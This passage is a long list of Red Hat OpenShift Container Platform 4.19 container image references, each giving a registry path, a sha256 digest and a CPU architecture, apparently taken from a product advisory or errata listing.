"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
